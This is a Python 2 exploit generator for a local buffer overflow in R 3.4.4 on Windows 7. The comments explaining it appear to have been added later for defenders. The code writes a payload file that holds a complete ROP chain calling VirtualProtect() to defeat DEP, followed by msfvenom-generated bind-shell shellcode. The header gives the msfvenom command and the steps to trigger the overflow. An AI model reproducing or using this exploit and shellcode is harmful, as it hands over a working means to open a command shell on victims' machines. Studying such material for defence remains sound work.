# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
# Exploit Author: Hashim Jawad
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
# Credit to bzyo for finding the bug (44516)
#
# Proof-of-concept generator. It performs no exploitation itself: it only
# writes one file, payload.txt, whose 5000 bytes are laid out as
#   292 bytes of filler up to the saved return address,
#   a POP ESI # RETN gadget plus the 4 bytes that POP consumes,
#   a 21-dword ROP chain that sets up and calls VirtualProtect() so the
#   stack becomes executable (this is the "DEP Bypass" in the title),
#   a 50-byte NOP sled, the 718-byte msfvenom shellcode, and NOP padding.
#
# Defender notes:
#  - Every gadget address below is an absolute, hard-coded pointer into the
#    named R modules (R.dll, Riconv.dll, utils.dll, methods.dll, grDevices.dll,
#    Rgraphapp.dll). The chain only works when those modules load at the same
#    base as on the author's test system, which is why the header pins the OS
#    and build; relocating those modules (ASLR-enabled builds) would break it.
#    Whether the shipped DLLs opt out of ASLR cannot be verified from this file.
#  - The script is Python 2 (print statement; str is a byte string). Under
#    Python 3 the str + struct.pack() concatenations below raise TypeError.
#  - The shebang is not on the first line of the file, so it has no effect.
#!/usr/bin/python
import struct

# Shellcode as emitted by msfvenom with the command recorded below. The
# alpha_mixed encoder is why almost every byte is printable ASCII; the
# excluded bytes (-b) are presumably those the preference field cannot carry.
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
# 59 lines of 12 bytes plus a final 10-byte line = 718 bytes, which agrees
# with the msfvenom size above and with the len(shellcode) used for padding.
shellcode =""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"

# Register layout the chain builds before PUSHAD; PUSHAD then writes these
# eight registers to the stack in the order VirtualProtect() expects its
# return address and arguments, and the final RETN dispatches into it.
'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''

# ESI = VirtualProtect(): load the IAT slot address, dereference it, move to ESI.
rop= struct.pack('<L', 0x6cacc7e2)# POP EAX # RETN[R.dll]
rop += struct.pack('<L', 0x643cb170)# ptr to &VirtualProtect()[IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435)# MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa)# XCHG EAX,ESI # RETN [R.dll]
# EBP = address VirtualProtect() returns to (a jmp esp, landing in the NOP sled).
rop += struct.pack('<L', 0x6cb7429a)# POP EBP # RETN[R.dll]
rop += struct.pack('<L', 0x6ca2a9bd)# & jmp esp [R.dll]
# EBX = dwSize (0x501). The small constant is produced by negating its two's
# complement so no NUL bytes appear in the chain.
rop += struct.pack('<L', 0x64c45db2)# POP EAX # RETN[methods.dll]
rop += struct.pack('<L', 0xfffffaff)# value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a)# NEG EAX # RETN[Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a)# XCHG EAX,EBX # RETN [R.dll]
# EDX = flNewProtect (0x40 = PAGE_EXECUTE_READWRITE), same NEG trick.
rop += struct.pack('<L', 0x6cbef3e4)# POP EAX # RETN[R.dll]
rop += struct.pack('<L', 0xffffffc0)# Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a)# NEG EAX # RETN[grDevices.dll]
rop += struct.pack('<L', 0x6ca558be)# XCHG EAX,EDX # RETN [R.dll]
# ECX = lpflOldProtect: any writable dword the API may scribble into.
rop += struct.pack('<L', 0x6cbe90a8)# POP ECX # RETN[R.dll]
rop += struct.pack('<L', 0x6ff863c1)# &Writable location[grDevices.dll]
# EDI = a bare RETN so the PUSHAD'd EDI slot falls through to ESI (the API).
rop += struct.pack('<L', 0x6cbe097f)# POP EDI # RETN[R.dll]
rop += struct.pack('<L', 0x6375fe5c)# RETN (ROP NOP)[Rgraphapp.dll]
# EAX = NOPs (pushed last; executed as padding after the jmp esp).
rop += struct.pack('<L', 0x6c998f58)# POP EAX # RETN[R.dll]
rop += struct.pack('<L', 0x90909090)# nop
rop += struct.pack('<L', 0x6fedfa6c)# PUSHAD # RETN [grDevices.dll]

# Assemble the file contents. The first gadget must land exactly on the saved
# EIP (offset 292); the final NOP block pads the total to 5000 bytes
# (with 21 rop dwords and 718 shellcode bytes that is 3848 bytes of padding).
buffer= '\x41' * 292# filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN[grDevices.dll]
buffer += '\x41' * 4# compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))

# Write payload.txt in the current directory. Note: text mode ('w'), not 'wb';
# f.close() is skipped if write() raises; and the broad except only prints the
# error, so a failed write is not signalled via the exit status.
try:
    f=open('payload.txt','w')
    print '[+] Creating %s bytes evil payload..' %len(buffer)
    f.write(buffer)
    f.close()
    print '[+] File created!'
except Exception as e:
    print e